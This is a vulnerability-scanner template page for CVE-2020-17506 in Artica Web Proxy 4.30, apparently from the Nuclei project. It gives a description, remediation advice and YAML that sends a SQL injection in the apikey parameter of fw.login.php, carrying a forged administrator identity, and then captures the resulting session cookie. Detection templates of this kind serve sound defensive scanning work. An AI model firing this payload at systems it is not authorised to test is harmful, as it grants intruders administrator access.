Skip to content
Nuclei Templates

Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection

ID: CVE-2020-17506

Severity: critical

Author: dwisiswant0

Tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli

Description

Section titled “Description”

Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.

YAML Source

Section titled “YAML Source”
id: CVE-2020-17506


info:
  name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
  author: dwisiswant0
  severity: critical
  description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
    - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
    - https://blog.max0x4141.com/post/artica_proxy/
    - https://github.com/hangmansROP/proof-of-concepts
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17506
    cwe-id: CWE-89
    epss-score: 0.96009
    epss-percentile: 0.99439
    cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: articatech
    product: web_proxy
  tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli


http:
  - method: GET
    path:
      - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"


    host-redirects: true
    max-redirects: 1


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "artica-applianc"


      - type: word
        part: header
        words:
          - "PHPSESSID"


      - type: status
        status:
          - 200
          - 301
          - 302
        condition: or


    extractors:
      - type: kval
        kval:
          - "PHPSESSID"
# digest: 4a0a0047304502204bdd7908870ece22b4998fad10a5006e2e2ec283705dba9b603d66c24e565385022100d93de6130cbd895b0087ad17e2a02b0e4e9982e41fbb43cf860cac2ba4787db6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17506.yaml"

View on Github